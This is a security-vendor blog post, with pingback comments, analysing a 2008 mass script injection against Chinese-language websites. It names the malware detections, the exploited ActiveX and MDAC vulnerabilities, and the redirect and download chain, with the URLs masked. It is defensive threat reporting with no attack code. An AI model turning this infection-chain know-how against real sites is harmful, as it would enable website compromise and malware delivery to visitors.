Just a week after half a million Web sites were compromised, here comes another mass Web threat — still no breathing easy for security researchers. Consider the fact that an even earlier SQL injection attack preceded the two we’ve just mentioned (a mere two days before the last attack, and one which also targeted Chinese users) and we have a series of mass compromises in a span of just two weeks.
This time, we picked up on another script injection attack aimed at Web sites in the Chinese language. Here’s an illustrated summary of this mass compromise:
A visit to any compromised site would install and execute a malicious script on a system. This said script, which Trend Micro detects as JS_IFRAME.AC, may be downloaded from the remote site http://{BLOCKED}.us/s.js.
Here is a screenshot of the injected script in one of the compromised sites:
JS_IFRAME.AC then downloads JS_IFRAME.AD, which exploits several vulnerabilities to further insert scripts in Web sites. TrendLabs Threats Analyst Jonathan San Jose identifies the following exploit routines of JS_IFRAME.AD:
- Exploits a vulnerability in Microsoft Data Access Components (MDAC) MS06-14, which allows for remote code execution on an affected system
- Uses the import function IERPCtl.IERPCtl.1 or IERPPLUG.DLL to send the shell code to an installed RealPlayer
- Checks for GLAVATAR.GLAvatarCtrl.1
- Exploits a BaoFeng2 Storm and MPS.StormPlayer.1 ActiveX control buffer overflow
- Takes advantage of an ActiveX control buffer overflow in Xunlei Thunder DapPlayer
Notice that the last two exploits are related to Chinese-language software, suggesting to our researchers that this malicious activity was targeted specifically to China, Taiwan, Singapore, and Hong Kong.
These vulnerabilities trigger JS_IFRAME.AD to redirect users to one of the following URLs:
- http://{BLOCKED}and.cn/real11.htm - detected as JS_REALPLAY.AT
- http://{BLOCKED}and.cn/real.htm - detected as JS_REALPLAY.CE
- http://{BLOCKED}and.cn/lz.htm - detected as JS_DLOADER.AP
- http://{BLOCKED}and.cn/bfyy.htm - detected as JS_DLOADER.GXS
- http://{BLOCKED}and.cn/14.htm - detected as JS_DLOADER.UOW
JS_IFRAME.AD was found to download the following:
- VBS_PSYME.CSZ
- JS_VEEMYFULL.AA
- JS_LIANZONG.E
- JS_SENGLOT.D
These four malware, in turn, download and execute http://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.
As of this writing, Google search results show some 327,000 pages that contain the malicious script tag.
Trend Micro Web Threat Protection (WTP) has already blocked access to the said malicious URLs. Users are advised to be cautious when browsing Web sites. Critical software patches, once available from vendors, should be installed to ensure software security.
Our researchers are still investigating other details regarding this case. More information to be posted as soon as they become available. Trend Micro is also now trying to reach Taiwan CERT to inform them of this mass compromise.
Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.
Updated by Mayee Corpin and Jovi Umawing (Technical Communications)
May 20th, 2008 at 10:11 am
[...] is reporting massive web based SQL Injection attacks are now underway on the Chinese mainland, here. First reported by (thanks and a Tip O’ the Hat to Heise, by the way) Heise Security in the [...]
May 20th, 2008 at 11:40 pm
[...] Hablamos en XKOD sobre los ataques que el gobierno Chino lanzaba a otros países, comprometiendo sus redes, causando problemas y acusaciones contra China, ahora el plato se volteo. [...]
May 21st, 2008 at 6:59 am
[...] speaking world. Its analysis - which includes graphics illustrating the attack - can be found here. Mass SQL injection hits English language websites | The Register __________________ [...]
May 21st, 2008 at 7:33 am
[...] Chinese Weekend Compromise. [...]
May 21st, 2008 at 12:43 pm
[...] Trend Micro says two exploits used in the latest SQL injection attacks are related to Chinese-language software, suggesting miscreants are specifically targeting the Chinese speaking world. Its analysis - which includes graphics illustrating the attack - can be found here. [...]
May 30th, 2008 at 5:37 pm
[...] of the vulnerability seems somewhat low, and not well discussed other than this blog entry, and one from Trend Micro - the HTML file ‘axlz.htm’ is identified as "Exploit:JS/Gdow.A" Incidentally, there are [...]